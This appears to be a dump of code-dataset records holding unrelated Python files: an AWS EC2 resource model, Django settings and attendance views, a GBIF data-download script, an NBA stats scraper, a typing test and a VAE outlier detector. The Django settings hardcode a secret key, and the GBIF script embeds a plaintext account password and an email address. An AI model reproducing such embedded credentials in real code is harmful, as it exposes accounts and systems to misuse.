AwsServiceType\n\n\nclass AssociatePublicIpAddress(Enum):\n    YES = 'Yes'\n    NO = 'No'\n    USE_SUBNET_SETTINGS = 'UseSubnetSettings'\n\n    @staticmethod\n    def convert_from_optional_boolean(boolean: Optional[bool]) -> AssociatePublicIpAddress:\n        if boolean is None:\n            return AssociatePublicIpAddress.USE_SUBNET_SETTINGS\n        if boolean:\n            return AssociatePublicIpAddress.YES\n        return AssociatePublicIpAddress.NO\n\n\n@dataclass\nclass Ec2RawData:\n    \"\"\"\n    Internal implementation detail, ignore.\n    \"\"\"\n    subnet_id: Optional[str] = None\n    private_ip_address: Optional[str] = None # Why is this singular?\n    public_ip_address: Optional[str] = None\n    ipv6_addresses: List[str] = field(default_factory=list)\n    associate_public_ip_address: Optional[AssociatePublicIpAddress] = None\n    security_groups_ids: List[str] = field(default_factory=list)\n\n\nclass Ec2Instance(NetworkEntity, AwsClient):\n    \"\"\"\n    Attributes:\n        instance_id: The ID of the instance.\n        name: The name of the EC2 instance, if set.\n        network_interfaces_ids: The network interfaces attached to the\n            instance.\n        state: The state of the instance.\n        image_id: The ID of the AMI used for EC2.\n        image_data: A pointer to the Ec2Image if found.\n        iam_profile_arn: The IAM profile assigned to this image, if one is assigned.\n        iam_profile_id: The ID of the IAM profile.\n        http_tokens: The HTTP tokens setting - optional or required.\n        availability_zone: The availability zone the EC2 is in, if configured.\n        instance_type: The Instance type (e.g. 'm5.8xlarge').\n        ebs_optimized: Indication whether the EC2 instance has EBS optimization enabled or not.\n        monitoring_enabled: Indication if the launched EC2 instance will have detailed monitoring enabled.\n    \"\"\"\n    def __init__(self,\n                 account: str,\n                 region: str,\n                 instance_id: str,\n                 name: str,\n                 network_interfaces_ids: List[str],\n                 state: str,\n                 image_id: str,\n                 iam_profile_name: Optional[str],\n                 http_tokens: str,\n                 availability_zone: Optional[str],\n                 tags: dict,\n                 instance_type: str,\n                 ebs_optimized: bool,\n                 monitoring_enabled: bool):\n        NetworkEntity.__init__(self, name or instance_id, account, region, AwsServiceName.AWS_EC2_INSTANCE,\n                               AwsServiceAttributes(aws_service_type=AwsServiceType.EC2.value, region=region))\n        AwsClient.__init__(self)\n        self.network_resource: NetworkResource = NetworkResource()\n        self.instance_id: str = instance_id\n        self.network_interfaces_ids: List[str] = network_interfaces_ids\n        self.state: str = state\n        self.image_id: str = image_id\n        self.iam_profile_name: Optional[str] = iam_profile_name\n        self.http_tokens: str = http_tokens\n        self.availability_zone: Optional[str] = availability_zone\n        self.image_data: Optional[Ec2Image] = None\n        self.raw_data: Ec2RawData = Ec2RawData()\n        if tags:\n            self.tags.update(tags)\n        self.instance_type: str = instance_type\n        self.ebs_optimized: bool = ebs_optimized\n        self.monitoring_enabled: bool = monitoring_enabled\n\n    def __str__(self):\n        name_or_id_msg = 'Instance Name: {}'.format(\n            self.name) if self.name else 'Instance Id: {}'.format(self.instance_id)\n        private_ips_msg = 'Private IP(s): {}'.format(', '.join(self.network_resource.private_ip_addresses))\n        public_ips_msg = 'Public IP(s): {}'.format(\n            self.network_resource.public_ip_addresses) \\\n            if self.network_resource.public_ip_addresses \\\n            else 'Public IP(s): None'\n        vpc_name_or_id_msg = 'VPC Name: {}'.format(\n            self.network_resource.vpc_name) \\\n            if self.network_resource.vpc_name else \\\n            f'VPC Id: {self.network_resource.vpc_id}'\n\n        return '{} {} {} {}'.format(name_or_id_msg, vpc_name_or_id_msg, 
public_ips_msg, private_ips_msg)\n\n def get_keys(self) -> List[str]:\n return [self.instance_id]\n\n def get_name(self) -> str:\n return self.name\n\n def get_id(self) -> str:\n return self.instance_id\n\n def get_extra_data(self) -> str:\n return str(self)\n\n def with_raw_data(self,\n subnet_id: Optional[str] = None,\n private_ip_address: Optional[str] = None, # Why is this singular?\n public_ip_address: Optional[str] = None,\n ipv6_addresses: List[str] = None,\n associate_public_ip_address: AssociatePublicIpAddress = None,\n security_groups_ids: List[str] = None) -> Ec2Instance:\n self.raw_data = Ec2RawData(subnet_id, private_ip_address, public_ip_address, ipv6_addresses or [],\n associate_public_ip_address, security_groups_ids or [])\n return self\n\n def get_type(self, is_plural: bool = False) -> str:\n if not is_plural:\n return 'EC2 Instance'\n else:\n return 'EC2 Instances'\n\n def get_cloud_resource_url(self) -> str:\n return '{0}ec2/v2/home?region={1}#InstanceDetails:instanceId={2}' \\\n .format(self.AWS_CONSOLE_URL, self.region, self.instance_id)\n\n def get_arn(self) -> str:\n pass\n\n @property\n def is_tagable(self) -> bool:\n return True\n", "sub_path": "cloudrail/knowledge/context/aws/resources/ec2/ec2_instance.py", "file_name": "ec2_instance.py", "file_ext": "py", "file_size_in_byte": 6228, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "enum.Enum", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 33, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 36, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 36, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 38, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 38, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 28, "usage_type": "name"}, {"api_name": "cloudrail.knowledge.context.aws.resources.networking_config.network_entity.NetworkEntity", "line_number": 41, "usage_type": "name"}, {"api_name": "cloudrail.knowledge.context.aws.resources.aws_client.AwsClient", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 64, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 69, "usage_type": "name"}, {"api_name": "cloudrail.knowledge.context.aws.resources.networking_config.network_entity.NetworkEntity.__init__", "line_number": 74, "usage_type": "call"}, {"api_name": "cloudrail.knowledge.context.aws.resources.networking_config.network_entity.NetworkEntity", "line_number": 74, "usage_type": "name"}, {"api_name": "cloudrail.knowledge.context.aws.resources.service_name.AwsServiceName.AWS_EC2_INSTANCE", "line_number": 74, "usage_type": "attribute"}, {"api_name": "cloudrail.knowledge.context.aws.resources.service_name.AwsServiceName", "line_number": 74, "usage_type": "name"}, {"api_name": "cloudrail.knowledge.context.aws.resources.service_name.AwsServiceAttributes", "line_number": 75, "usage_type": "call"}, {"api_name": "cloudrail.knowledge.context.aws.resources.service_name.AwsServiceType.EC2", 
"line_number": 75, "usage_type": "attribute"}, {"api_name": "cloudrail.knowledge.context.aws.resources.service_name.AwsServiceType", "line_number": 75, "usage_type": "name"}, {"api_name": "cloudrail.knowledge.context.aws.resources.aws_client.AwsClient.__init__", "line_number": 76, "usage_type": "call"}, {"api_name": "cloudrail.knowledge.context.aws.resources.aws_client.AwsClient", "line_number": 76, "usage_type": "name"}, {"api_name": "cloudrail.knowledge.context.aws.resources.networking_config.network_resource.NetworkResource", "line_number": 77, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 85, "usage_type": "name"}, {"api_name": "cloudrail.knowledge.context.aws.resources.ec2.ec2_image.Ec2Image", "line_number": 85, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 108, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 121, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 122, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 123, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 124, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 126, "usage_type": "name"}]} +{"seq_id": "43164084", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/lucio/Projects/django-custard/custard/example/example/settings.py\n# Compiled at: 2014-07-29 05:28:08\n\"\"\"\nDjango settings for example project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\nimport sys\nsys.path.append(os.path.dirname(BASE_DIR))\nSECRET_KEY = '%gt7a3*l@a4-o3f-*v**0=jn38pvwpfrcy%a(t&4xb#6nix5&!'\nDEBUG = True\nTEMPLATE_DEBUG = True\nALLOWED_HOSTS = []\nINSTALLED_APPS = ('django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes',\n 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles',\n 'custard', 'example.demo')\nMIDDLEWARE_CLASSES = ('django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware')\nROOT_URLCONF = 'example.urls'\nWSGI_APPLICATION = 'example.wsgi.application'\nDATABASES = {'default': {'ENGINE': 'django.db.backends.sqlite3', \n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3')}}\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nSTATIC_URL = '/static/'\ntry:\n import suit\n from django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS as TCP\n INSTALLED_APPS = ('suit', ) + INSTALLED_APPS\n TEMPLATE_CONTEXT_PROCESSORS = TCP + ('django.core.context_processors.request', )\nexcept ImportError:\n pass\n\nCUSTOM_CONTENT_TYPES = ('example', 'user')", "sub_path": "pycfiles/django-custard-0.10.tar/settings.py", "file_name": "settings.py", "file_ext": "py", "file_size_in_byte": 1999, 
"program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "django.conf.global_settings.TEMPLATE_CONTEXT_PROCESSORS", "line_number": 44, "usage_type": "name"}]} +{"seq_id": "574743283", "text": "import requests\n# Файл аналогичен прокомментированному файлу \"gbif_downl_api_genus_striga.py\". Файл, сформированный в ответ на запрос, не скачивается по ссылке.\nreq_data = {\n \"creator\": \"pavel_polonchuk\",\n \"notificationAddresses\": [\n \"Chelonpepk@gmail.com\"\n ],\n \"sendNotification\": 'true',\n \"format\": \"SIMPLE_CSV\",\n \"predicate\": {\n \"type\": \"and\",\n \"predicates\": [\n {\n \"type\": \"equals\",\n \"key\": \"TAXON_KEY\",\n \"value\": \"2927479\"\n },\n {\n \"type\": \"equals\",\n \"key\": \"YEAR\",\n \"value\": \"2020\"\n },\n {\n \"type\": \"in\",\n \"key\": \"COUNTRY\",\n \"values\": [\n \"RU\"\n ]\n }\n ]\n }\n}\n\nres = requests.post('https://api.gbif.org/v1/occurrence/download/request', json=req_data, auth=('pavel_polonchuk', 'Feature_1'))\ninstance_code = res.content\n\nprint(instance_code)\n\nrequest_instance_code = instance_code.decode()\n\nprint(request_instance_code)\n\ndownload_base_url = 'https://api.gbif.org/v1/occurrence/download/request/'\n\nreq = requests.get(f'{download_base_url}{request_instance_code}.zip', allow_redirects=True)\n\nprint(f'{download_base_url}{request_instance_code}.zip')\n\nprint(req)\n\nwith open('download_res_cuscuta.zip', 'wb') as a_file:\n a_file.write(req.content)\n", "sub_path": "gbif_downl_api_genus_cuscuta.py", "file_name": "gbif_downl_api_genus_cuscuta.py", "file_ext": "py", "file_size_in_byte": 1363, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.post", "line_number": 34, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "394755752", "text": "from django.shortcuts import render, redirect, reverse\nfrom django.core.paginator import Paginator\nfrom django.contrib.auth import login, authenticate\nfrom django.views import generic\nfrom attendance.models import Event\nfrom .forms import SignUpForm, EventForm, AttendForm\nfrom datetime import datetime\n\n\ntoday = datetime.today()\nnow = datetime.now()\n\n\n# Create your views here.\ndef index(request):\n num_future_events = Event.objects.filter(date__gte=today).filter(approved=True).count()\n query_set = Event.objects.filter(date__gte=today).filter(approved=True).order_by('date', 'time')[:3]\n\n context = {\n 'num_future_events': num_future_events,\n 'query_set': query_set\n }\n\n return render(request, 'index.html', context=context)\n\n\nclass EventListView(generic.ListView):\n model = Event\n query_set = Event.objects.filter(date__gte=today).exclude(approved=False).order_by('date', 'time')[:21]\n template_name = 'listPage.html'\n\n def get_queryset(self):\n return self.query_set.all() # all forces the query 
set to update\n\n\nclass EventDetailView(generic.DetailView):\n model = Event\n template_name = 'eventDetail.html'\n\n\ndef RegisterUser(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n return redirect('index')\n else:\n form = SignUpForm()\n\n return render(request, 'register.html', {'form': form})\n\n\ndef CreateEvent(request):\n event_form = EventForm(data=request.POST)\n if event_form.is_valid():\n event = event_form.save()\n if request.user.is_superuser:\n event.approved = True\n event.save()\n return redirect('event_detail', pk=event.pk)\n else:\n event_form = EventForm()\n return render(request, \"eventForm.html\", {'form': event_form})\n\n\ndef attend(request, pk):\n alumni_form = AttendForm(data=request.POST)\n if alumni_form.is_valid():\n event = Event.objects.get(pk=pk)\n event.numAttend += 1\n alumni = alumni_form.save(commit=False)\n alumni.attended = event\n event.save()\n alumni.save()\n return redirect('event_detail', pk)\n else:\n alumni_form = AttendForm()\n return render(request, \"attendForm.html\", {'form': alumni_form})\n\n\ndef reports(request):\n event_list = Event.objects.all()\n event_list = event_list.filter(approved=True, date__lte=today)\n event_list = event_list.order_by('-date', 'time')\n paginator = Paginator(event_list, 10) # Show 10 contacts per page\n\n page = request.GET.get('page')\n events = paginator.get_page(page)\n return render(request, 'reportPage.html', {'events': events})\n\n\ndef attendanceList(request, pk):\n event = Event.objects.get(pk=pk)\n alumni = event.alumni_set.all()\n return render(request, 'attendList.html', {'alumni': alumni})\n", "sub_path": "attendance/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3103, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "datetime.datetime.today", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 10, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 11, "usage_type": "name"}, {"api_name": "attendance.models.Event.objects.filter", "line_number": 16, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "attendance.models.Event", "line_number": 16, "usage_type": "name"}, {"api_name": "attendance.models.Event.objects.filter", "line_number": 17, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "attendance.models.Event", "line_number": 17, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}, {"api_name": "django.views.generic.ListView", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 27, "usage_type": "name"}, {"api_name": "attendance.models.Event", "line_number": 28, "usage_type": "name"}, {"api_name": "attendance.models.Event.objects.filter", "line_number": 29, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "attendance.models.Event", "line_number": 29, "usage_type": "name"}, 
{"api_name": "django.views.generic.DetailView", "line_number": 36, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 36, "usage_type": "name"}, {"api_name": "attendance.models.Event", "line_number": 37, "usage_type": "name"}, {"api_name": "forms.SignUpForm", "line_number": 43, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 48, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 49, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 50, "usage_type": "call"}, {"api_name": "forms.SignUpForm", "line_number": 52, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 54, "usage_type": "call"}, {"api_name": "forms.EventForm", "line_number": 58, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 64, "usage_type": "call"}, {"api_name": "forms.EventForm", "line_number": 66, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}, {"api_name": "forms.AttendForm", "line_number": 71, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects.get", "line_number": 73, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "attendance.models.Event", "line_number": 73, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 79, "usage_type": "call"}, {"api_name": "forms.AttendForm", "line_number": 81, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 82, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects.all", "line_number": 86, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects", "line_number": 86, "usage_type": "attribute"}, {"api_name": "attendance.models.Event", "line_number": 86, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 89, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 93, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects.get", "line_number": 97, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "attendance.models.Event", "line_number": 97, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 99, "usage_type": "call"}]} +{"seq_id": "645967113", "text": "import json\n\nfrom nba_api.stats.endpoints import leagueleaders\n\n\ncustom_headers = {\n \"Host\": \"stats.nba.com\",\n \"Connection\": \"keep-alive\",\n \"Cache-Control\": \"max-age=0\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"en-US,en;q=0.9\",\n}\n\n\ndef by_year(year, stat):\n \"\"\" \"\"\"\n obj = leagueleaders.LeagueLeaders(\n league_id=\"00\",\n per_mode48=\"Totals\",\n scope=\"S\",\n season=year,\n season_type_all_star=\"Regular Season\",\n stat_category_abbreviation=stat,\n headers=custom_headers,\n )\n return obj.get_dict()[\"resultSet\"][\"rowSet\"]\n\n\nYEARS = [\n \"2014-15\",\n \"2015-16\",\n \"2016-17\",\n \"2017-18\",\n \"2018-19\",\n \"2019-20\",\n \"2020-21\",\n]\n\nCATS = [\n \"MIN\",\n 
\"PTS\",\n \"REB\",\n \"STL\",\n \"BLK\",\n \"EFF\",\n \"AST\",\n \"FTA\",\n]\n\nif __name__ == \"__main__\":\n with open(\"teams.json\") as f:\n data = json.load(f)\n\n history = {}\n for year in YEARS:\n history[year] = {}\n for cat in CATS:\n history[year][cat] = by_year(year, cat)\n\n totals = {}\n for year, awards in data.items():\n for award in awards:\n print(year, award)\n if award not in totals:\n totals[award] = []\n\n scraped = []\n for player in awards[award]:\n for cat in CATS:\n for rank, row in enumerate(history[year][cat]):\n if row[2] == player:\n scraped.append([cat, rank + 1, player, year])\n totals[award].extend(scraped)\n\n with open(\"ranks.json\", \"w+\") as f:\n json.dump(totals, f, indent=4)\n", "sub_path": "db/leaders.py", "file_name": "leaders.py", "file_ext": "py", "file_size_in_byte": 1977, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "nba_api.stats.endpoints.leagueleaders.LeagueLeaders", "line_number": 20, "usage_type": "call"}, {"api_name": "nba_api.stats.endpoints.leagueleaders", "line_number": 20, "usage_type": "name"}, {"api_name": "json.load", "line_number": 55, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "170885691", "text": "import time\nimport random\nimport requests\nfrom bs4 import BeautifulSoup\nimport matplotlib.pyplot as plt\nimport numpy as np\n# make sure to import all of these libraries to make the code work\n\ndef wpm(words, seconds):\n mins,secs = divmod(seconds, 60)\n tmin = mins + (secs/60)\n return int(words/tmin)\n\ndef inac(correct, total):\n percent = (correct/total)\n return round(percent*100)\n\ndef gen_words():\n web = requests.get(\"http://www.mieliestronk.com/corncob_lowercase.txt\")\n soup = BeautifulSoup(web.text, 'html.parser')\n english_words = list(soup)[0].strip(\"\\r\").split()\n select = random.choice(english_words)\n return select\n\ndef plot(file_name):\n file = open(file_name, \"r\")\n text = file.read()\n stats = text.split(\"\\n\")\n del stats[len(stats) - 1]\n new_stats = []\n for score in stats:\n stat = score.split()\n new_stats.append(stat)\n new_stats = np.array(new_stats)\n new_stats = new_stats.T\n new_stats = list(new_stats)\n wpm, ac = new_stats\n wpm = [int(x) for x in wpm]\n ac = [\"Test #\" + str(pos + 1) + \": \" + num + \"%\" for pos, num in enumerate(ac)]\n ypos = np.arange(len(ac))\n plt.xticks(ypos, ac)\n plt.bar(ypos, wpm)\n plt.show()\n\ndef main(length):\n name = input(\"What is your name?\\n\")\n file_name = name + \".txt\"\n file = open(file_name, \"ab\")\n total = 0\n count = 0\n start = time.time()\n end = time.time()\n inp = None\n word = None\n while int(end - start) <= length:\n word = gen_words()\n inp = input(word + \"\\n\")\n if str(inp) == word:\n count += 1\n total += 1\n end = time.time()\n if str(inp) == word:\n count -= 1\n file.write(bytes(str(wpm(count, length - total*1.75)) + \" \" + str(inac(count, total - 1)) + \"\\n\", \"UTF-8\"))\n file.close()\n plot(file_name)\n\nmain(60) # you can choose how many seconds you want, default is 60\n", "sub_path": "typing-test.py", "file_name": "typing-test.py", "file_ext": "py", "file_size_in_byte": 1904, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 19, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 20, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 22, 
"usage_type": "call"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "time.time", "line_number": 51, "usage_type": "call"}, {"api_name": "time.time", "line_number": 52, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "32434402", "text": "import numpy as np\nimport pickle\nimport random\n\nfrom model import model\nfrom utils import flatten, performance, outlier_stats\n\n\nclass OutlierVAE(object):\n \"\"\" Outlier detection using variational autoencoders (VAE).\n \n Arguments:\n - threshold: (float): reconstruction error (mse) threshold used to classify outliers\n - reservoir_size (int): number of observations kept in memory using reservoir sampling used for mean and stdev\n \n Functions:\n - reservoir_sampling: applies reservoir sampling to incoming data\n - predict: detect and return outliers\n - send_feedback: add target labels as part of the feedback loop\n - metrics: return custom metrics\n \"\"\"\n def __init__(self,threshold=10,reservoir_size=50000,model_name='vae',load_path='./models/'):\n \n self.threshold = threshold\n self.reservoir_size = reservoir_size\n self.batch = []\n self.N = 0 # total sample count up until now for reservoir sampling\n \n # load model architecture parameters\n with open(load_path + model_name + '.pickle', 'rb') as f:\n n_features, hidden_layers, latent_dim, hidden_dim, output_activation = pickle.load(f)\n \n # instantiate model\n self.vae = model(n_features,hidden_layers=hidden_layers,latent_dim=latent_dim,\n hidden_dim=hidden_dim,output_activation=output_activation)\n self.vae.load_weights(load_path + model_name + '_weights.h5') # load pretrained model weights\n self.vae._make_predict_function()\n \n # load data preprocessing info\n with open(load_path + 'preprocess_' + model_name + '.pickle', 'rb') as f:\n preprocess = pickle.load(f)\n self.preprocess, self.clip, self.axis = preprocess[:3]\n if self.preprocess=='minmax':\n self.xmin, self.xmax = preprocess[3:5]\n self.min, self.max = preprocess[5:]\n elif self.preprocess=='standardized':\n self.mu, self.sigma = preprocess[3:]\n \n self._predictions = []\n self._labels = []\n self._mse = []\n self.roll_window = 100\n self.metric = [float('nan') for i in range(18)]\n \n \n def reservoir_sampling(self,X,update_stand=False):\n \"\"\" Keep batch of data in memory using reservoir sampling. 
\"\"\"\n for item in X:\n self.N+=1\n if len(self.batch) < self.reservoir_size:\n self.batch.append(item)\n else:\n s = int(random.random() * self.N)\n if s < self.reservoir_size:\n self.batch[s] = item\n \n if update_stand:\n if self.preprocess=='minmax':\n self.xmin = np.array(self.batch).min(axis=self.axis)\n self.xmax = np.array(self.batch).max(axis=self.axis)\n elif self.preprocess=='standardized':\n self.mu = np.array(self.batch).mean(axis=self.axis)\n self.sigma = np.array(self.batch).std(axis=self.axis)\n return\n\n \n def predict(self,X,feature_names):\n \"\"\" Detect outliers from mse using the threshold. \n \n Arguments:\n - X: input data\n - feature_names\n \"\"\"\n \n # clip data per feature\n X = np.clip(X,[-c for c in self.clip],self.clip)\n \n if self.N < self.reservoir_size:\n update_stand = False\n else:\n update_stand = True\n \n self.reservoir_sampling(X,update_stand=update_stand)\n \n # apply scaling\n if self.preprocess=='minmax':\n X_scaled = ((X - self.xmin) / (self.xmax - self.xmin)) * (self.max - self.min) + self.min\n elif self.preprocess=='standardized':\n X_scaled = (X - self.mu) / (self.sigma + 1e-10)\n \n # sample latent variables and calculate reconstruction errors\n N = 10\n mse = np.zeros([X.shape[0],N])\n for i in range(N):\n preds = self.vae.predict(X_scaled)\n mse[:,i] = np.mean(np.power(X_scaled - preds, 2), axis=1)\n self.mse = np.mean(mse, axis=1)\n self._mse.append(self.mse)\n self._mse = flatten(self._mse)\n \n # make prediction\n self.prediction = np.array([1 if e > self.threshold else 0 for e in self.mse]).astype(int)\n self._predictions.append(self.prediction)\n self._predictions = flatten(self._predictions)\n \n return self.prediction\n \n \n def send_feedback(self,X,feature_names,reward,truth):\n \"\"\" Return outlier labels as part of the feedback loop.\n \n Arguments:\n - X: input data\n - feature_names\n - reward\n - truth: outlier labels\n \"\"\"\n self.label = truth\n self._labels.append(self.label)\n self._labels = flatten(self._labels)\n \n scores = performance(self._labels,self._predictions,roll_window=self.roll_window)\n stats = outlier_stats(self._labels,self._predictions,roll_window=self.roll_window)\n \n convert = flatten([scores,stats])\n metric = []\n for c in convert: # convert from np to native python type to jsonify\n metric.append(np.asscalar(np.asarray(c)))\n self.metric = metric\n \n return\n\n \n def metrics(self):\n \"\"\" Return custom metrics.\n Printed with a delay of 1 prediction because the labels are returned in the feedback step. 
\n \"\"\"\n \n if self.mse.shape[0]>1:\n raise ValueError('Metrics can only handle single observations.')\n \n if self.N==1:\n pred = float('nan')\n err = float('nan')\n y_true = float('nan')\n else:\n pred = int(self._predictions[-2])\n err = self._mse[-2]\n y_true = int(self.label[0])\n \n is_outlier = {\"type\":\"GAUGE\",\"key\":\"is_outlier\",\"value\":pred}\n mse = {\"type\":\"GAUGE\",\"key\":\"mse\",\"value\":err}\n obs = {\"type\":\"GAUGE\",\"key\":\"observation\",\"value\":self.N - 1}\n threshold = {\"type\":\"GAUGE\",\"key\":\"threshold\",\"value\":self.threshold}\n \n label = {\"type\":\"GAUGE\",\"key\":\"label\",\"value\":y_true}\n \n accuracy_tot = {\"type\":\"GAUGE\",\"key\":\"accuracy_tot\",\"value\":self.metric[4]}\n precision_tot = {\"type\":\"GAUGE\",\"key\":\"precision_tot\",\"value\":self.metric[5]}\n recall_tot = {\"type\":\"GAUGE\",\"key\":\"recall_tot\",\"value\":self.metric[6]}\n f1_score_tot = {\"type\":\"GAUGE\",\"key\":\"f1_tot\",\"value\":self.metric[7]}\n f2_score_tot = {\"type\":\"GAUGE\",\"key\":\"f2_tot\",\"value\":self.metric[8]}\n \n accuracy_roll = {\"type\":\"GAUGE\",\"key\":\"accuracy_roll\",\"value\":self.metric[9]}\n precision_roll = {\"type\":\"GAUGE\",\"key\":\"precision_roll\",\"value\":self.metric[10]}\n recall_roll = {\"type\":\"GAUGE\",\"key\":\"recall_roll\",\"value\":self.metric[11]}\n f1_score_roll = {\"type\":\"GAUGE\",\"key\":\"f1_roll\",\"value\":self.metric[12]}\n f2_score_roll = 